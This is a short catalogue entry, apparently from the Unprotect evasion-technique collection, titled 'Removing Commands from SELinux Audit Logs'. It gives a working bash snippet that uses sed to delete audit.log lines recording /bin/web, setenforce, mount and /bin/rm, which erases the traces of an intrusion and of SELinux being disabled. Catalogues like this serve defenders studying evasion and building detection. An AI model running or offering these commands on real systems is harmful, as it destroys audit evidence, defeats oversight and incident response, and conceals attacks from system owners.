Linux bash / Removing Commands from SELinux Audit Logs
| Author | Unprotect |
| Platform | Linux |
| Language | bash |
| Technique | Removing Commands from SELinux Audit Logs |
Code
# Navigate to the SELinux audit log directory
cd /data/var/log/audit/
# Remove specific executed commands from the audit log
sed -i '/bin\/web/d' audit.log
sed -i '/setenforce/d' audit.log
sed -i '/mount/d' audit.log
sed -i '/bin\/rm/d' audit.logCreated
January 16, 2025
Last Revised
January 16, 2025